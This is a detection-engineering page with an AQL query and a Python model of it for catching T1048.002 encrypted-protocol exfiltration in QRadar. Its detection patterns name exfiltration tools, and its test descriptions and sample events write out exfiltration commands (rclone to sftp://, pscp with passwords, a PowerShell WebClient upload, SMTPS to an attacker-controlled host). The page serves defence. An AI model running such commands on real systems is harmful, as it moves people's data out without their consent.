
Detect Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in IBM QRadar

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Common protocols include HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use asymmetric encryption (public-key cryptography) for key exchange, often transitioning to symmetric encryption for bulk data transfer. Because these protocols are widely used for legitimate business purposes, malicious exfiltration traffic can blend in with normal network activity. Threat actors such as APT28, CURIUM, and Storm-1811 have leveraged HTTPS, SMTPS, and SCP respectively for data exfiltration.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Sub-technique
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/002/

QRadar Detection Query

IBM QRadar (QRadar)
SELECT DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
       LOGSOURCENAME(logsourceid) AS LogSource,
       username,
       sourceip,
       destinationip,
       destinationport,
       "EventID",
       "Process Name" AS ProcessName,
       "CommandLine",
       CATEGORYNAME(category) AS Category
FROM events
WHERE LOGSOURCETYPEID IN (12, 229)
  AND (
    (
      "EventID" IN ('1', '4688')
      AND (
        "Process Name" IMATCHES '.*(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)'
        OR (
          "Process Name" IMATCHES '.*(powershell\.exe|cmd\.exe)'
          AND "CommandLine" IMATCHES '.*(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp).*'
        )
        OR (
          "Process Name" IMATCHES '.*curl\.exe'
          AND "CommandLine" IMATCHES '.*(--ssl|--tls|sftp://|ftps://).*'
        )
      )
    )
    OR (
      "EventID" = '3'
      AND destinationport IN (22, 443, 465, 587, 990, 993, 8443, 21)
      AND (
        "Process Name" IMATCHES '.*(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)'
        OR "CommandLine" IMATCHES '.*(sftp|smtps|webdav|ftps|rclone).*'
      )
      AND NOT (
        destinationip ILIKE '10.%'
        OR destinationip ILIKE '172.16.%' OR destinationip ILIKE '172.17.%' OR destinationip ILIKE '172.18.%'
        OR destinationip ILIKE '172.19.%' OR destinationip ILIKE '172.20.%' OR destinationip ILIKE '172.21.%'
        OR destinationip ILIKE '172.22.%' OR destinationip ILIKE '172.23.%' OR destinationip ILIKE '172.24.%'
        OR destinationip ILIKE '172.25.%' OR destinationip ILIKE '172.26.%' OR destinationip ILIKE '172.27.%'
        OR destinationip ILIKE '172.28.%' OR destinationip ILIKE '172.29.%' OR destinationip ILIKE '172.30.%'
        OR destinationip ILIKE '172.31.%'
        OR destinationip ILIKE '192.168.%'
        OR destinationip ILIKE '127.%'
      )
    )
  )
ORDER BY starttime DESC
LAST 24 HOURS

Severity: High · Confidence: High

Detects T1048.002 exfiltration over asymmetrically encrypted non-C2 protocols using IBM QRadar AQL. Queries Sysmon (LOGSOURCETYPEID 229) and Windows Security (LOGSOURCETYPEID 12) events. Covers EventID 1/4688 (ProcessCreate) for known exfiltration tool execution and suspicious shell invocations, and EventID 3 (NetworkConnect) for those processes making outbound connections to encrypted protocol ports on public IP addresses. Excludes RFC1918 and loopback address ranges. Because AQL's MATCHES and IMATCHES operators compare the regular expression against the entire field value, each pattern is wrapped in '.*' so that a full image path such as C:\Tools\rclone.exe still matches; IMATCHES is already case-insensitive, so no '(?i)' flag is needed. The time window is expressed with the AQL LAST clause, which stands on its own after ORDER BY rather than being joined to the WHERE conditions with AND. Note that Sysmon EventID 3 records carry no command line, so the NetworkConnect branch matches in practice on the Process Name field alone.

Data Sources

IBM QRadar with Windows Security Event Log DSM
IBM QRadar with Sysmon Universal DSM

Required Tables

events

False Positives & Tuning

  • Authorized use of WinSCP, FileZilla, or rclone by IT administrators for routine file transfer operations to managed external SFTP servers or cloud storage buckets
  • Automated backup jobs configured to run rclone or similar tools to push encrypted backups to approved cloud providers via SFTP or HTTPS
  • DevOps pipelines using curl or wget to push build artifacts over HTTPS to external container registries, artifact stores, or partner APIs
  • Security tooling performing encrypted callbacks to vendor SaaS infrastructure over standard HTTPS ports as part of licensed product operation

Testing Methodology

Validate this detection against the 5 Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Rclone Exfiltration via SFTP

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy', 'sftp://', destination IP, and --sftp-pass flag. Sysmon Event ID 3: Network connection attempt to 192.0.2.1:22. DeviceProcessEvents and DeviceNetworkEvents in MDE will capture the event.

  2. Test 2: SCP File Transfer to External Host

    Expected signal: Sysmon Event ID 1: Process Create with Image=pscp.exe, CommandLine containing destination IP, remote path, and -pw flag (password in clear text is itself a forensic indicator). Sysmon Event ID 3: TCP connection attempt to 198.51.100.1:22. Security Event ID 4688 if command-line auditing is enabled.

  3. Test 3: PowerShell HTTPS Exfiltration via WebClient Upload

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Net.WebClient', 'UploadData', and 'https://'. Sysmon Event ID 3: TCP connection attempt to 127.0.0.1:4443. PowerShell ScriptBlock Log Event ID 4104 with full script. DeviceNetworkEvents in MDE will show the HTTPS connection attempt.

  4. Test 4: Rclone MEGA Cloud Storage Exfiltration Simulation

    Expected signal: Sysmon Event ID 11: File creation of rclone_test.conf in %TEMP% containing MEGA credentials. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine referencing --config path and 'mega_remote:'. Sysmon Event ID 3: DNS query and TCP connection attempt to MEGA API endpoints (g.api.mega.co.nz). DeviceFileEvents will capture config file creation.

  5. Test 5: SMTPS Email Exfiltration via PowerShell

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'SmtpClient', 'EnableSsl = $true', port 587, and external hostname. Sysmon Event ID 3: TCP connection attempt to smtp.attacker-controlled.com:587. Sysmon Event ID 22: DNS query for attacker-controlled.com. PowerShell ScriptBlock Log Event ID 4104 with full script content.
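To make the rule's two branches concrete and to check them against the expected signals of Tests 1 to 3, here is an added Python model of the QRadar query. It is example code written for this page, not the AQL itself and not IBM's or any vendor's code. It re-implements the ProcessCreate and NetworkConnect conditions over constructed Sysmon-style event records whose field names mirror the query ("EventID", "Process Name", "CommandLine", destinationip, destinationport); the sample events, their "id" labels, the paths and the command lines are assumptions built from the test descriptions above. The RFC1918/loopback exclusion is expressed as four networks instead of the query's prefix wildcards, and the documentation ranges 192.0.2.0/24 and 198.51.100.0/24 used by the tests are deliberately treated as public, exactly as the AQL does. Running it shows that the Test 3 WebClient upload fires neither branch (its command line contains none of the keywords and port 4443 is not in the port list), which is a coverage gap to weigh when tuning.

```python
"""Offline model of the T1048.002 QRadar rule, run over constructed events.

Added example for illustration; not the page's AQL and not vendor code.
"""
import ipaddress
import re

# Same patterns as the AQL query; re.search plays the role of the '.*' wrapping.
TOOL_RE = re.compile(r"(rclone|winscp|pscp|psftp|filezilla|sftp|scp|curl|wget)\.exe$", re.I)
SHELL_RE = re.compile(r"(powershell|cmd)\.exe$", re.I)
SHELL_CMD_RE = re.compile(r"(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp)", re.I)
CURL_RE = re.compile(r"curl\.exe$", re.I)
CURL_CMD_RE = re.compile(r"(--ssl|--tls|sftp://|ftps://)", re.I)
NET_CMD_RE = re.compile(r"(sftp|smtps|webdav|ftps|rclone)", re.I)
ENCRYPTED_PORTS = {22, 443, 465, 587, 990, 993, 8443, 21}

# RFC1918 plus loopback, the same ranges the query's ILIKE list spells out.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(ip: str) -> bool:
    """True for RFC1918 and loopback only (not for documentation ranges)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def process_create_matches(ev: dict) -> bool:
    """EventID 1/4688 branch: known tools, or shells/curl with transfer keywords."""
    proc = ev.get("Process Name", "")
    cmd = ev.get("CommandLine", "")
    if TOOL_RE.search(proc):
        return True
    if SHELL_RE.search(proc) and SHELL_CMD_RE.search(cmd):
        return True
    return bool(CURL_RE.search(proc) and CURL_CMD_RE.search(cmd))


def network_connect_matches(ev: dict) -> bool:
    """EventID 3 branch: encrypted-protocol port, known tool, non-internal destination."""
    proc = ev.get("Process Name", "")
    cmd = ev.get("CommandLine", "")  # absent on Sysmon Event 3; kept to mirror the AQL
    if ev.get("destinationport") not in ENCRYPTED_PORTS:
        return False
    if not (TOOL_RE.search(proc) or NET_CMD_RE.search(cmd)):
        return False
    return not is_internal(ev["destinationip"])


def evaluate(ev: dict) -> bool:
    """Apply the whole rule to one event record."""
    if ev.get("logsourcetypeid") not in (12, 229):
        return False
    eid = str(ev.get("EventID"))
    if eid in ("1", "4688"):
        return process_create_matches(ev)
    if eid == "3":
        return network_connect_matches(ev)
    return False


# Constructed sample events modelled on Tests 1-3 above plus two benign records.
SAMPLE_EVENTS = [
    {"id": "t1-proc", "logsourcetypeid": 229, "EventID": "1", "Process Name": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Data sftp://192.0.2.1/upload --sftp-pass REDACTED"},
    {"id": "t1-net", "logsourcetypeid": 229, "EventID": "3", "Process Name": r"C:\Tools\rclone.exe",
     "destinationip": "192.0.2.1", "destinationport": 22},
    {"id": "t2-proc", "logsourcetypeid": 229, "EventID": "1", "Process Name": r"C:\Tools\pscp.exe",
     "CommandLine": r"pscp.exe -pw REDACTED C:\Data\doc.pdf user@198.51.100.1:/tmp/"},
    {"id": "t2-net", "logsourcetypeid": 229, "EventID": "3", "Process Name": r"C:\Tools\pscp.exe",
     "destinationip": "198.51.100.1", "destinationport": 22},
    {"id": "t3-proc", "logsourcetypeid": 229, "EventID": "1",
     "Process Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c $w=New-Object Net.WebClient;$w.UploadData('https://127.0.0.1:4443/',$b)"},
    {"id": "t3-net", "logsourcetypeid": 229, "EventID": "3",
     "Process Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "destinationip": "127.0.0.1", "destinationport": 4443},
    # Admin WinSCP session to an internal SFTP host: excluded by the RFC1918 filter.
    {"id": "benign-admin", "logsourcetypeid": 229, "EventID": "3", "Process Name": r"C:\Program Files\WinSCP\WinSCP.exe",
     "destinationip": "10.20.30.40", "destinationport": 22},
    # Ordinary browser HTTPS: no tool match, no command-line keyword.
    {"id": "benign-browser", "logsourcetypeid": 229, "EventID": "3", "Process Name": r"C:\Program Files\Google\Chrome\chrome.exe",
     "destinationip": "203.0.113.5", "destinationport": 443},
]


def run(events=SAMPLE_EVENTS) -> list:
    """Return the ids of the events the rule would surface."""
    return [ev["id"] for ev in events if evaluate(ev)]


if __name__ == "__main__":
    print(run())  # ['t1-proc', 't1-net', 't2-proc', 't2-net']
```

The network check is the part worth carrying back into the AQL if the exclusion list grows: a single 172.16.0.0/12 membership test replaces sixteen ILIKE clauses and cannot drift out of step with the RFC1918 boundary.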
